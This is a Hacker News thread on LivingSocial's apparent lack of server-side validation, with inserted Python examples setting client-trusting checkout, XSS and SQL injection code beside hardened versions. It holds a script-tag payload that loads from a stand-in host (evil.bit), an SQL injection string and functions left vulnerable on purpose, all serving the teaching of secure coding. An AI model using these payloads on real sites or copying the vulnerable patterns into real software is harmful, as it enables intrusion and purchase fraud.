Hacker News

Ah, the article should have mentioned that you don't get the gift certificates immediately. That means LivingSocial's not completely screwed just yet.

Nonetheless, not having server-side validation built in indicates pretty bad practice. For one, it causes them a lot of grief and work reversing all the transactions. But further, it indicates that they probably have gaping security flaws lying around waiting to be exploited.
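As an added illustration of the point above (this is example code, not LivingSocial's handler), here is a checkout endpoint that trusts the total the browser computed, beside one that recomputes the charge on the server from its own catalog and validates every client-supplied field. The catalog, deal ids, price field names and the quantity cap are all assumptions made up for the example.

```python
"""Client-trusting checkout handler beside a server-validated one.

Added example. CATALOG, the deal ids, the request field names and
MAX_QTY are constructed for illustration, not taken from any real site.
"""
import json

# Constructed catalog: deal id -> unit price in cents (assumption).
CATALOG = {"deal-42": 2500, "deal-77": 1000}
MAX_QTY = 10


class ValidationError(ValueError):
    """Raised when a request fails server-side checks."""


def charge_trusting_client(raw_request: str) -> dict:
    """VULNERABLE: charges whatever total the client says it owes.

    A user who edits the form or replays the request with total_cents=0
    gets the deal for free; nothing on the server notices.
    """
    req = json.loads(raw_request)
    return {"deal_id": req["deal_id"], "charged_cents": int(req["total_cents"])}


def charge_server_validated(raw_request: str) -> dict:
    """Hardened: every field is checked and the price is recomputed here.

    The client-supplied total is never used for billing; it is only
    compared against the server's figure so a mismatch can be logged.
    """
    req = json.loads(raw_request)

    deal_id = req.get("deal_id")
    if not isinstance(deal_id, str) or deal_id not in CATALOG:
        raise ValidationError("unknown deal")

    qty = req.get("quantity")
    # bool is a subclass of int, so reject True/False explicitly.
    if not isinstance(qty, int) or isinstance(qty, bool) or not 1 <= qty <= MAX_QTY:
        raise ValidationError("quantity must be an integer between 1 and %d" % MAX_QTY)

    total = CATALOG[deal_id] * qty
    mismatch = "total_cents" in req and req["total_cents"] != total
    return {"deal_id": deal_id, "charged_cents": total, "client_total_mismatch": mismatch}


# Constructed request: the browser was told to pay 0 for two of deal-42.
TAMPERED_REQUEST = json.dumps({"deal_id": "deal-42", "quantity": 2, "total_cents": 0})

if __name__ == "__main__":
    print("trusting:", charge_trusting_client(TAMPERED_REQUEST))
    print("validated:", charge_server_validated(TAMPERED_REQUEST))
```

The hardened version treats the request as hostile input: unknown deal ids and out-of-range or non-integer quantities are rejected before any price is computed, and the charge is derived only from server-side data.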




My thoughts exactly. Server side validation is basic. There is nothing special you need to do to make it work and a lot of web frameworks now take care of 99% of that code for you anyways. This makes me think that on the software side of things, they are skipping basic steps. If I were looking, I'd consider SQL injections next. Or even XSS attacks. Yes, my name really is Igor<script src="http://evil.bit/hack.js type="text/javascript"></script>.
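Taking the comment's two follow-on guesses literally, here is an added example (not code from the site under discussion) showing the name from the comment above rendered with and without output encoding, and a user lookup written with string concatenation beside the parameterized form. The table, the rows, and the closing quote added after `hack.js` are assumptions made for the example.

```python
"""Reflected XSS and SQL injection, each beside its fix.

Added example. The users table and its rows are constructed; the script
tag is the one from the comment above with its missing closing quote
supplied.
"""
import html
import sqlite3

# Constructed input: the commenter's "real name".
EVIL_NAME = 'Igor<script src="http://evil.bit/hack.js" type="text/javascript"></script>'


def greeting_unsafe(name: str) -> str:
    """VULNERABLE: the name is dropped straight into the page markup."""
    return f"<p>Hello, {name}!</p>"


def greeting_safe(name: str) -> str:
    """Hardened: HTML-encode untrusted text before placing it in markup."""
    return f"<p>Hello, {html.escape(name, quote=True)}!</p>"


def make_db() -> sqlite3.Connection:
    """In-memory table with two constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, email TEXT)")
    conn.executemany(
        "INSERT INTO users (name, email) VALUES (?, ?)",
        [("Igor", "igor@example.com"), ("Alice", "alice@example.com")],
    )
    conn.commit()
    return conn


def find_user_unsafe(conn: sqlite3.Connection, name: str) -> list:
    """VULNERABLE: the name is spliced into the SQL text."""
    cur = conn.execute(f"SELECT name, email FROM users WHERE name = '{name}'")
    return cur.fetchall()


def find_user_safe(conn: sqlite3.Connection, name: str) -> list:
    """Hardened: the name travels as a bound parameter, never as SQL."""
    cur = conn.execute("SELECT name, email FROM users WHERE name = ?", (name,))
    return cur.fetchall()


# Constructed injection string: closes the quote and adds an always-true clause.
INJECTION = "nobody' OR '1'='1"

if __name__ == "__main__":
    print(greeting_unsafe(EVIL_NAME))
    print(greeting_safe(EVIL_NAME))
    db = make_db()
    print("unsafe lookup:", find_user_unsafe(db, INJECTION))
    print("safe lookup:", find_user_safe(db, INJECTION))
```

The encoded greeting contains no live `<script>` element, only the literal characters, and the parameterized query returns no rows for the injection string because the database compares it as a plain value rather than parsing it as SQL.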





